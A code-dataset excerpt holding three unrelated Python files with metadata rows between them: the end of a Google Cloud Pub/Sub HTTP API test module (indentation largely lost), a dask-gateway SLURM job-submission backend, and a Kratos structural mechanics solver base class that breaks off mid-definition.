self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SNAPSHOT_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_snapshot_create_already_exists(self):
from google.cloud.exceptions import NotFound
BODY = {
'subscription': self.SUB_PATH
}
connection = _Connection()
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
with self.assertRaises(NotFound):
            api.snapshot_create(self.SNAPSHOT_PATH, self.SUB_PATH)
self.assertEqual(connection._called_with['method'], 'PUT')
path = '/%s' % (self.SNAPSHOT_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'], BODY)
def test_snapshot_delete(self):
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, self.PROJECT)
api = self._make_one(client)
api.snapshot_delete(self.SNAPSHOT_PATH)
self.assertEqual(connection._called_with['method'], 'DELETE')
path = '/%s' % (self.SNAPSHOT_PATH,)
self.assertEqual(connection._called_with['path'], path)
class Test_IAMPolicyAPI(_Base):
@staticmethod
def _get_target_class():
from google.cloud.pubsub._http import _IAMPolicyAPI
return _IAMPolicyAPI
def test_ctor(self):
connection = _Connection()
client = _Client(connection, None)
api = self._make_one(client)
self.assertEqual(api.api_request, connection.api_request)
def test_get_iam_policy(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
OWNER1 = 'user:phred@example.com'
OWNER2 = 'group:cloud-logs@google.com'
EDITOR1 = 'domain:google.com'
EDITOR2 = 'user:phred@example.com'
VIEWER1 = 'serviceAccount:1234-abcdef@service.example.com'
VIEWER2 = 'user:phred@example.com'
RETURNED = {
'etag': 'DEADBEEF',
'version': 17,
'bindings': [
{'role': OWNER_ROLE, 'members': [OWNER1, OWNER2]},
{'role': EDITOR_ROLE, 'members': [EDITOR1, EDITOR2]},
{'role': VIEWER_ROLE, 'members': [VIEWER1, VIEWER2]},
],
}
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
policy = api.get_iam_policy(self.TOPIC_PATH)
self.assertEqual(policy, RETURNED)
self.assertEqual(connection._called_with['method'], 'GET')
path = '/%s:getIamPolicy' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
def test_set_iam_policy(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
OWNER1 = 'user:phred@example.com'
OWNER2 = 'group:cloud-logs@google.com'
EDITOR1 = 'domain:google.com'
EDITOR2 = 'user:phred@example.com'
VIEWER1 = 'serviceAccount:1234-abcdef@service.example.com'
VIEWER2 = 'user:phred@example.com'
POLICY = {
'etag': 'DEADBEEF',
'version': 17,
'bindings': [
{'role': OWNER_ROLE, 'members': [OWNER1, OWNER2]},
{'role': EDITOR_ROLE, 'members': [EDITOR1, EDITOR2]},
{'role': VIEWER_ROLE, 'members': [VIEWER1, VIEWER2]},
],
}
RETURNED = POLICY.copy()
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
policy = api.set_iam_policy(self.TOPIC_PATH, POLICY)
self.assertEqual(policy, RETURNED)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:setIamPolicy' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'policy': POLICY})
def test_test_iam_permissions(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
ALL_ROLES = [OWNER_ROLE, EDITOR_ROLE, VIEWER_ROLE]
ALLOWED = ALL_ROLES[1:]
RETURNED = {'permissions': ALLOWED}
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
allowed = api.test_iam_permissions(self.TOPIC_PATH, ALL_ROLES)
self.assertEqual(allowed, ALLOWED)
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:testIamPermissions' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'permissions': ALL_ROLES})
def test_test_iam_permissions_missing_key(self):
from google.cloud.pubsub.iam import OWNER_ROLE
from google.cloud.pubsub.iam import EDITOR_ROLE
from google.cloud.pubsub.iam import VIEWER_ROLE
ALL_ROLES = [OWNER_ROLE, EDITOR_ROLE, VIEWER_ROLE]
RETURNED = {}
connection = _Connection(RETURNED)
client = _Client(connection, None)
api = self._make_one(client)
allowed = api.test_iam_permissions(self.TOPIC_PATH, ALL_ROLES)
self.assertEqual(allowed, [])
self.assertEqual(connection._called_with['method'], 'POST')
path = '/%s:testIamPermissions' % (self.TOPIC_PATH,)
self.assertEqual(connection._called_with['path'], path)
self.assertEqual(connection._called_with['data'],
{'permissions': ALL_ROLES})
class Test__transform_messages_base64(unittest.TestCase):
def _call_fut(self, messages, transform, key=None):
from google.cloud.pubsub._http import _transform_messages_base64
return _transform_messages_base64(messages, transform, key)
def test__transform_messages_base64_empty_message(self):
from base64 import b64decode
DATA = [{'message': {}}]
self._call_fut(DATA, b64decode, 'message')
self.assertEqual(DATA, [{'message': {}}])
def test__transform_messages_base64_empty_data(self):
from base64 import b64decode
DATA = [{'message': {'data': b''}}]
self._call_fut(DATA, b64decode, 'message')
self.assertEqual(DATA, [{'message': {'data': b''}}])
def test__transform_messages_base64_pull(self):
from base64 import b64encode
DATA = [{'message': {'data': b'testing 1 2 3'}}]
self._call_fut(DATA, b64encode, 'message')
self.assertEqual(DATA[0]['message']['data'],
b64encode(b'testing 1 2 3'))
def test__transform_messages_base64_publish(self):
from base64 import b64encode
DATA = [{'data': b'testing 1 2 3'}]
self._call_fut(DATA, b64encode)
self.assertEqual(DATA[0]['data'], b64encode(b'testing 1 2 3'))
class _Connection(object):
_called_with = None
_no_response_error = None
def __init__(self, *responses):
self._responses = responses
def api_request(self, **kw):
from google.cloud.exceptions import NotFound
self._called_with = kw
try:
response, self._responses = self._responses[0], self._responses[1:]
except IndexError:
err_class = self._no_response_error or NotFound
raise err_class('miss')
return response
class _Client(object):
def __init__(self, connection, project):
self._connection = connection
self.project = project
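# Illustrative note (not part of the original test module): the _Connection fake
# above replays its queued responses in order, records the keyword arguments of
# the most recent call in `_called_with`, and raises NotFound (or whatever class
# is set on `_no_response_error`) once the queue is exhausted. A typical wiring,
# sketched here only for illustration:
#
#     connection = _Connection({'name': 'projects/PROJECT/topics/TOPIC'})
#     client = _Client(connection, 'PROJECT')
#     resource = connection.api_request(method='GET', path='/projects/PROJECT/topics/TOPIC')
#     assert connection._called_with['method'] == 'GET'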
| 37.235849
| 79
| 0.638621
|
794fe19dcec28ad6fb64a0917e1c07f83b92917e
| 3,959
|
py
|
Python
|
dask-gateway-server/dask_gateway_server/backends/jobqueue/slurm.py
|
AndreaGiardini/dask-gateway
|
c2583548df19359d24031e1dd9161c616d3bed50
|
[
"BSD-3-Clause"
] | 69
|
2019-09-19T06:19:48.000Z
|
2022-02-04T23:01:15.000Z
|
dask-gateway-server/dask_gateway_server/backends/jobqueue/slurm.py
|
AndreaGiardini/dask-gateway
|
c2583548df19359d24031e1dd9161c616d3bed50
|
[
"BSD-3-Clause"
] | 318
|
2019-09-18T18:42:57.000Z
|
2022-03-31T11:05:38.000Z
|
dask-gateway-server/dask_gateway_server/backends/jobqueue/slurm.py
|
AndreaGiardini/dask-gateway
|
c2583548df19359d24031e1dd9161c616d3bed50
|
[
"BSD-3-Clause"
] | 61
|
2019-09-18T18:09:56.000Z
|
2022-03-25T20:35:11.000Z
|
import math
import os
import shutil
from traitlets import Unicode, default
from .base import JobQueueBackend, JobQueueClusterConfig
from ...traitlets import Type
__all__ = ("SlurmBackend", "SlurmClusterConfig")
def slurm_format_memory(n):
"""Format memory in bytes for use with slurm."""
if n >= 10 * (1024 ** 3):
return "%dG" % math.ceil(n / (1024 ** 3))
if n >= 10 * (1024 ** 2):
return "%dM" % math.ceil(n / (1024 ** 2))
if n >= 10 * 1024:
return "%dK" % math.ceil(n / 1024)
return "1K"
class SlurmClusterConfig(JobQueueClusterConfig):
"""Dask cluster configuration options when running on SLURM"""
partition = Unicode("", help="The partition to submit jobs to.", config=True)
qos = Unicode("", help="QOS string associated with each job.", config=True)
account = Unicode("", help="Account string associated with each job.", config=True)
class SlurmBackend(JobQueueBackend):
"""A backend for deploying Dask on a Slurm cluster."""
cluster_config_class = Type(
"dask_gateway_server.backends.jobqueue.slurm.SlurmClusterConfig",
klass="dask_gateway_server.backends.base.ClusterConfig",
help="The cluster config class to use",
config=True,
)
@default("submit_command")
def _default_submit_command(self):
return shutil.which("sbatch") or "sbatch"
@default("cancel_command")
def _default_cancel_command(self):
return shutil.which("scancel") or "scancel"
@default("status_command")
def _default_status_command(self):
return shutil.which("squeue") or "squeue"
def get_submit_cmd_env_stdin(self, cluster, worker=None):
cmd = [self.submit_command, "--parsable"]
cmd.append("--job-name=dask-gateway")
if cluster.config.partition:
cmd.append("--partition=" + cluster.config.partition)
        if cluster.config.account:
            cmd.append("--account=" + cluster.config.account)
        if cluster.config.qos:
            cmd.append("--qos=" + cluster.config.qos)
if worker:
cpus = cluster.config.worker_cores
mem = slurm_format_memory(cluster.config.worker_memory)
log_file = "dask-worker-%s.log" % worker.name
script = "\n".join(
[
"#!/bin/sh",
cluster.config.worker_setup,
" ".join(self.get_worker_command(cluster, worker.name)),
]
)
env = self.get_worker_env(cluster)
else:
cpus = cluster.config.scheduler_cores
mem = slurm_format_memory(cluster.config.scheduler_memory)
log_file = "dask-scheduler-%s.log" % cluster.name
script = "\n".join(
[
"#!/bin/sh",
cluster.config.scheduler_setup,
" ".join(self.get_scheduler_command(cluster)),
]
)
env = self.get_scheduler_env(cluster)
staging_dir = self.get_staging_directory(cluster)
cmd.extend(
[
"--chdir=" + staging_dir,
"--output=" + os.path.join(staging_dir, log_file),
"--cpus-per-task=%d" % cpus,
"--mem=%s" % mem,
"--export=%s" % (",".join(sorted(env))),
]
)
return cmd, env, script
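    # Illustrative note (not part of the original module): for a hypothetical
    # worker with 2 cores and 4 GiB of memory on partition "batch", the returned
    # cmd would look roughly like
    #   ['sbatch', '--parsable', '--job-name=dask-gateway', '--partition=batch',
    #    '--chdir=<staging dir>', '--output=<staging dir>/dask-worker-<name>.log',
    #    '--cpus-per-task=2', '--mem=4096M', '--export=<comma-separated env keys>'],
    # with the job script itself passed to sbatch on stdin.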
def get_stop_cmd_env(self, job_id):
return [self.cancel_command, job_id], {}
def get_status_cmd_env(self, job_ids):
cmd = [self.status_command, "-h", "--job=%s" % ",".join(job_ids), "-o", "%i %t"]
return cmd, {}
def parse_job_states(self, stdout):
states = {}
for l in stdout.splitlines():
job_id, state = l.split()
states[job_id] = state in ("R", "CG", "PD", "CF")
return states
def parse_job_id(self, stdout):
return stdout.strip()
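# Illustrative sketch (not part of the original module) of the parsing helpers
# above: squeue is invoked with `-h --job=<ids> -o "%i %t"`, so each output line
# is "<job id> <state code>", and a job counts as still alive while it is
# running (R), completing (CG), pending (PD) or configuring (CF):
#
#     backend = SlurmBackend()
#     backend.parse_job_states("1234 R\n1235 CD\n1236 PD")
#     # -> {'1234': True, '1235': False, '1236': True}
#     backend.parse_job_id("4242\n")
#     # -> '4242'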
| 32.45082
| 88
| 0.576156
|
794fe2ea8816533628ae9764137dfbcb380f78d9
| 30,200
|
py
|
Python
|
applications/StructuralMechanicsApplication/python_scripts/structural_mechanics_solver.py
|
AndreaVoltan/MyKratos7.0
|
e977752722e8ef1b606f25618c4bf8fd04c434cc
|
[
"BSD-4-Clause"
] | 2
|
2020-04-30T19:13:08.000Z
|
2021-04-14T19:40:47.000Z
|
applications/StructuralMechanicsApplication/python_scripts/structural_mechanics_solver.py
|
AndreaVoltan/MyKratos7.0
|
e977752722e8ef1b606f25618c4bf8fd04c434cc
|
[
"BSD-4-Clause"
] | 1
|
2020-04-30T19:19:09.000Z
|
2020-05-02T14:22:36.000Z
|
applications/StructuralMechanicsApplication/python_scripts/structural_mechanics_solver.py
|
AndreaVoltan/MyKratos7.0
|
e977752722e8ef1b606f25618c4bf8fd04c434cc
|
[
"BSD-4-Clause"
] | 1
|
2020-06-12T08:51:24.000Z
|
2020-06-12T08:51:24.000Z
|
from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# Importing the Kratos Library
import KratosMultiphysics
# Import applications
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
# Importing the base class
from python_solver import PythonSolver
def CreateSolver(model, custom_settings):
return MechanicalSolver(model, custom_settings)
class MechanicalSolver(PythonSolver):
"""The base class for structural mechanics solvers.
This class provides functions for importing and exporting models,
adding nodal variables and dofs and solving each solution step.
Derived classes must override the function _create_solution_scheme which
constructs and returns a solution scheme. Depending on the type of
solver, derived classes may also need to override the following functions:
_create_solution_scheme
_create_convergence_criterion
_create_linear_solver
_create_builder_and_solver
_create_mechanical_solution_strategy
    The mechanical_solution_strategy, builder_and_solver, etc. should always be retrieved
using the getter functions get_mechanical_solution_strategy, get_builder_and_solver,
etc. from this base class.
Only the member variables listed below should be accessed directly.
Public member variables:
model -- the model containing the modelpart used to construct the solver.
settings -- Kratos parameters containing solver settings.
"""
def __init__(self, model, custom_settings):
super(MechanicalSolver, self).__init__(model, custom_settings)
default_settings = KratosMultiphysics.Parameters("""
{
"model_part_name" : "",
"domain_size" : -1,
"echo_level": 0,
"buffer_size": 2,
"analysis_type": "non_linear",
"model_import_settings": {
"input_type": "mdpa",
"input_filename": "unknown_name"
},
"computing_model_part_name" : "computing_domain",
"material_import_settings" :{
"materials_filename": ""
},
"time_stepping" : { },
"rotation_dofs": false,
"reform_dofs_at_each_step": false,
"line_search": false,
"compute_reactions": true,
"block_builder": true,
"clear_storage": false,
"move_mesh_flag": true,
"multi_point_constraints_used": true,
"convergence_criterion": "residual_criterion",
"displacement_relative_tolerance": 1.0e-4,
"displacement_absolute_tolerance": 1.0e-9,
"residual_relative_tolerance": 1.0e-4,
"residual_absolute_tolerance": 1.0e-9,
"max_iteration": 10,
"linear_solver_settings": { },
"problem_domain_sub_model_part_list": ["solid"],
"processes_sub_model_part_list": [""],
"auxiliary_variables_list" : [],
"auxiliary_dofs_list" : [],
"auxiliary_reaction_list" : []
}
""")
# temporary warnings, to be removed
if custom_settings.Has("bodies_list"):
custom_settings.RemoveValue("bodies_list")
warning = '\n::[MechanicalSolver]:: W-A-R-N-I-N-G: You have specified "bodies_list", '
warning += 'which is deprecated and will be removed soon. \nPlease remove it from the "solver settings"!\n'
self.print_warning_on_rank_zero("Bodies list", warning)
if custom_settings.Has("solver_type"):
custom_settings.RemoveValue("solver_type")
warning = '\n::[MechanicalSolver]:: W-A-R-N-I-N-G: You have specified "solver_type", '
warning += 'which is only needed if you use the "python_solvers_wrapper_structural". \nPlease remove it '
warning += 'from the "solver settings" if you dont use this wrapper, this check will be removed soon!\n'
self.print_warning_on_rank_zero("Solver type", warning)
if custom_settings.Has("time_integration_method"):
custom_settings.RemoveValue("time_integration_method")
warning = '\n::[MechanicalSolver]:: W-A-R-N-I-N-G: You have specified "time_integration_method", '
warning += 'which is only needed if you use the "python_solvers_wrapper_structural". \nPlease remove it '
warning += 'from the "solver settings" if you dont use this wrapper, this check will be removed soon!\n'
self.print_warning_on_rank_zero("Time integration method", warning)
# Overwrite the default settings with user-provided parameters.
self.settings.ValidateAndAssignDefaults(default_settings)
model_part_name = self.settings["model_part_name"].GetString()
if model_part_name == "":
raise Exception('Please specify a model_part name!')
# This will be changed once the Model is fully supported!
if self.model.HasModelPart(model_part_name):
self.main_model_part = self.model[model_part_name]
else:
self.main_model_part = self.model.CreateModelPart(model_part_name)
domain_size = self.settings["domain_size"].GetInt()
if domain_size < 0:
raise Exception('Please specify a "domain_size" >= 0!')
self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.DOMAIN_SIZE, domain_size)
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Construction finished")
# Set if the analysis is restarted
if self.settings["model_import_settings"]["input_type"].GetString() == "rest":
self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED] = True
else:
self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED] = False
def AddVariables(self):
# this can safely be called also for restarts, it is internally checked if the variables exist already
# Add displacements.
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION)
# Add specific variables for the problem conditions.
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.POSITIVE_FACE_PRESSURE)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.NEGATIVE_FACE_PRESSURE)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.POINT_LOAD)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.LINE_LOAD)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.SURFACE_LOAD)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VOLUME_ACCELERATION)
if self.settings["rotation_dofs"].GetBool():
# Add specific variables for the problem (rotation dofs).
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ROTATION)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.REACTION_MOMENT)
self.main_model_part.AddNodalSolutionStepVariable(StructuralMechanicsApplication.POINT_MOMENT)
# Add variables that the user defined in the ProjectParameters
for i in range(self.settings["auxiliary_variables_list"].size()):
variable_name = self.settings["auxiliary_variables_list"][i].GetString()
variable = KratosMultiphysics.KratosGlobals.GetVariable(variable_name)
self.main_model_part.AddNodalSolutionStepVariable(variable)
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Variables ADDED")
def GetMinimumBufferSize(self):
return 2
def AddDofs(self):
# this can safely be called also for restarts, it is internally checked if the dofs exist already
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_X, KratosMultiphysics.REACTION_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Y, KratosMultiphysics.REACTION_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.DISPLACEMENT_Z, KratosMultiphysics.REACTION_Z,self.main_model_part)
if self.settings["rotation_dofs"].GetBool():
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_X, KratosMultiphysics.REACTION_MOMENT_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Y, KratosMultiphysics.REACTION_MOMENT_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ROTATION_Z, KratosMultiphysics.REACTION_MOMENT_Z,self.main_model_part)
# Add dofs that the user defined in the ProjectParameters
if (self.settings["auxiliary_dofs_list"].size() != self.settings["auxiliary_reaction_list"].size()):
raise Exception("DoFs list and reaction list should be the same long")
for i in range(self.settings["auxiliary_dofs_list"].size()):
dof_variable_name = self.settings["auxiliary_dofs_list"][i].GetString()
reaction_variable_name = self.settings["auxiliary_reaction_list"][i].GetString()
if (KratosMultiphysics.KratosGlobals.HasDoubleVariable(dof_variable_name)): # Double variable
dof_variable = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name)
reaction_variable = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name)
KratosMultiphysics.VariableUtils().AddDof(dof_variable, reaction_variable,self.main_model_part)
elif (KratosMultiphysics.KratosGlobals.HasArrayVariable(dof_variable_name)): # Components variable
dof_variable_x = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name + "_X")
reaction_variable_x = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name + "_X")
KratosMultiphysics.VariableUtils().AddDof(dof_variable_x, reaction_variable_x, self.main_model_part)
dof_variable_y = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name + "_Y")
reaction_variable_y = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name + "_Y")
KratosMultiphysics.VariableUtils().AddDof(dof_variable_y, reaction_variable_y, self.main_model_part)
dof_variable_z = KratosMultiphysics.KratosGlobals.GetVariable(dof_variable_name + "_Z")
reaction_variable_z = KratosMultiphysics.KratosGlobals.GetVariable(reaction_variable_name + "_Z")
KratosMultiphysics.VariableUtils().AddDof(dof_variable_z, reaction_variable_z, self.main_model_part)
else:
self.print_warning_on_rank_zero("auxiliary_reaction_list list", "The variable " + dof_variable_name + "is not a compatible type")
self.print_on_rank_zero("::[MechanicalSolver]:: ", "DOF's ADDED")
def ImportModelPart(self):
"""This function imports the ModelPart
"""
self._ImportModelPart(self.main_model_part, self.settings["model_import_settings"])
def PrepareModelPart(self):
if not self.is_restarted():
# Check and prepare computing model part and import constitutive laws.
self._execute_after_reading()
self._set_and_fill_buffer()
KratosMultiphysics.Logger.PrintInfo("::[MechanicalSolver]::", "ModelPart prepared for Solver.")
def Initialize(self):
"""Perform initialization after adding nodal variables and dofs to the main model part. """
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Initializing ...")
# The mechanical solution strategy is created here if it does not already exist.
if self.settings["clear_storage"].GetBool():
self.Clear()
mechanical_solution_strategy = self.get_mechanical_solution_strategy()
mechanical_solution_strategy.SetEchoLevel(self.settings["echo_level"].GetInt())
if not self.is_restarted():
mechanical_solution_strategy.Initialize()
else:
# SetInitializePerformedFlag is not a member of SolvingStrategy but
# is used by ResidualBasedNewtonRaphsonStrategy.
try:
mechanical_solution_strategy.SetInitializePerformedFlag(True)
except AttributeError:
pass
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Finished initialization.")
def InitializeSolutionStep(self):
if self.settings["clear_storage"].GetBool():
self.Clear()
self.Initialize() #required after clearing
self.get_mechanical_solution_strategy().InitializeSolutionStep()
def Predict(self):
self.get_mechanical_solution_strategy().Predict()
def SolveSolutionStep(self):
is_converged = self.get_mechanical_solution_strategy().SolveSolutionStep()
if not is_converged:
msg = "Solver did not converge for step " + str(self.main_model_part.ProcessInfo[KratosMultiphysics.STEP]) + "\n"
msg += "corresponding to time " + str(self.main_model_part.ProcessInfo[KratosMultiphysics.TIME]) + "\n"
self.print_warning_on_rank_zero("::[MechanicalSolver]:: ",msg)
return is_converged
def FinalizeSolutionStep(self):
self.get_mechanical_solution_strategy().FinalizeSolutionStep()
def AdvanceInTime(self, current_time):
dt = self.ComputeDeltaTime()
new_time = current_time + dt
self.main_model_part.ProcessInfo[KratosMultiphysics.STEP] += 1
self.main_model_part.CloneTimeStep(new_time)
return new_time
def ComputeDeltaTime(self):
return self.settings["time_stepping"]["time_step"].GetDouble()
def GetComputingModelPart(self):
if not self.main_model_part.HasSubModelPart(self.settings["computing_model_part_name"].GetString()):
raise Exception("The ComputingModelPart was not created yet!")
return self.main_model_part.GetSubModelPart(self.settings["computing_model_part_name"].GetString())
def ExportModelPart(self):
name_out_file = self.settings["model_import_settings"]["input_filename"].GetString()+".out"
file = open(name_out_file + ".mdpa","w")
file.close()
KratosMultiphysics.ModelPartIO(name_out_file, KratosMultiphysics.IO.WRITE).WriteModelPart(self.main_model_part)
def SetEchoLevel(self, level):
self.get_mechanical_solution_strategy().SetEchoLevel(level)
def Clear(self):
self.get_mechanical_solution_strategy().Clear()
def Check(self):
self.get_mechanical_solution_strategy().Check()
#### Specific internal functions ####
def get_solution_scheme(self):
if not hasattr(self, '_solution_scheme'):
self._solution_scheme = self._create_solution_scheme()
return self._solution_scheme
def get_convergence_criterion(self):
if not hasattr(self, '_convergence_criterion'):
self._convergence_criterion = self._create_convergence_criterion()
return self._convergence_criterion
def get_linear_solver(self):
if not hasattr(self, '_linear_solver'):
self._linear_solver = self._create_linear_solver()
return self._linear_solver
def get_builder_and_solver(self):
if (self.settings["multi_point_constraints_used"].GetBool() is False and
self.GetComputingModelPart().NumberOfMasterSlaveConstraints() > 0):
self.settings["multi_point_constraints_used"].SetBool(True)
self._builder_and_solver = self._create_builder_and_solver()
if not hasattr(self, '_builder_and_solver'):
self._builder_and_solver = self._create_builder_and_solver()
return self._builder_and_solver
def get_mechanical_solution_strategy(self):
if (self.settings["multi_point_constraints_used"].GetBool() is False and
self.GetComputingModelPart().NumberOfMasterSlaveConstraints() > 0):
self._mechanical_solution_strategy = self._create_mechanical_solution_strategy()
if not hasattr(self, '_mechanical_solution_strategy'):
self._mechanical_solution_strategy = self._create_mechanical_solution_strategy()
return self._mechanical_solution_strategy
def import_constitutive_laws(self):
materials_filename = self.settings["material_import_settings"]["materials_filename"].GetString()
if (materials_filename != ""):
# Add constitutive laws and material properties from json file to model parts.
material_settings = KratosMultiphysics.Parameters("""{"Parameters": {"materials_filename": ""}} """)
material_settings["Parameters"]["materials_filename"].SetString(materials_filename)
KratosMultiphysics.ReadMaterialsUtility(material_settings, self.model)
materials_imported = True
else:
materials_imported = False
return materials_imported
def is_restarted(self):
# this function avoids the long call to ProcessInfo and is also safer
# in case the detection of a restart is changed later
return self.main_model_part.ProcessInfo[KratosMultiphysics.IS_RESTARTED]
#### Private functions ####
def _execute_after_reading(self):
"""Prepare computing model part and import constitutive laws. """
        # Auxiliary parameters object for the CheckAndPrepareModelProcess
params = KratosMultiphysics.Parameters("{}")
params.AddValue("model_part_name",self.settings["model_part_name"])
params.AddValue("computing_model_part_name",self.settings["computing_model_part_name"])
params.AddValue("problem_domain_sub_model_part_list",self.settings["problem_domain_sub_model_part_list"])
params.AddValue("processes_sub_model_part_list",self.settings["processes_sub_model_part_list"])
# Assign mesh entities from domain and process sub model parts to the computing model part.
import check_and_prepare_model_process_structural
check_and_prepare_model_process_structural.CheckAndPrepareModelProcess(self.model, params).Execute()
# Import constitutive laws.
materials_imported = self.import_constitutive_laws()
if materials_imported:
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Constitutive law was successfully imported.")
else:
self.print_on_rank_zero("::[MechanicalSolver]:: ", "Constitutive law was not imported.")
def _set_and_fill_buffer(self):
"""Prepare nodal solution step data containers and time step information. """
# Set the buffer size for the nodal solution steps data. Existing nodal
# solution step data may be lost.
required_buffer_size = self.settings["buffer_size"].GetInt()
if required_buffer_size < self.GetMinimumBufferSize():
required_buffer_size = self.GetMinimumBufferSize()
current_buffer_size = self.main_model_part.GetBufferSize()
buffer_size = max(current_buffer_size, required_buffer_size)
self.main_model_part.SetBufferSize(buffer_size)
# Cycle the buffer. This sets all historical nodal solution step data to
# the current value and initializes the time stepping in the process info.
delta_time = self.main_model_part.ProcessInfo[KratosMultiphysics.DELTA_TIME]
time = self.main_model_part.ProcessInfo[KratosMultiphysics.TIME]
        step = -buffer_size
time = time - delta_time * buffer_size
self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.TIME, time)
for i in range(0, buffer_size):
step = step + 1
time = time + delta_time
self.main_model_part.ProcessInfo.SetValue(KratosMultiphysics.STEP, step)
self.main_model_part.CloneTimeStep(time)
def _add_dynamic_variables(self):
# For being consistent for Serial and Trilinos
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ACCELERATION)
if self.settings["rotation_dofs"].GetBool():
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ANGULAR_VELOCITY)
self.main_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ANGULAR_ACCELERATION)
def _add_dynamic_dofs(self):
# For being consistent for Serial and Trilinos
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.VELOCITY_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.VELOCITY_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.VELOCITY_Z,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ACCELERATION_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ACCELERATION_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ACCELERATION_Z,self.main_model_part)
if(self.settings["rotation_dofs"].GetBool()):
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_VELOCITY_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_VELOCITY_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_VELOCITY_Z,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_ACCELERATION_X,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_ACCELERATION_Y,self.main_model_part)
KratosMultiphysics.VariableUtils().AddDof(KratosMultiphysics.ANGULAR_ACCELERATION_Z,self.main_model_part)
def _get_convergence_criterion_settings(self):
# Create an auxiliary Kratos parameters object to store the convergence settings.
conv_params = KratosMultiphysics.Parameters("{}")
conv_params.AddValue("convergence_criterion",self.settings["convergence_criterion"])
conv_params.AddValue("rotation_dofs",self.settings["rotation_dofs"])
conv_params.AddValue("echo_level",self.settings["echo_level"])
conv_params.AddValue("displacement_relative_tolerance",self.settings["displacement_relative_tolerance"])
conv_params.AddValue("displacement_absolute_tolerance",self.settings["displacement_absolute_tolerance"])
conv_params.AddValue("residual_relative_tolerance",self.settings["residual_relative_tolerance"])
conv_params.AddValue("residual_absolute_tolerance",self.settings["residual_absolute_tolerance"])
return conv_params
def _create_convergence_criterion(self):
import convergence_criteria_factory
convergence_criterion = convergence_criteria_factory.convergence_criterion(self._get_convergence_criterion_settings())
return convergence_criterion.mechanical_convergence_criterion
def _create_linear_solver(self):
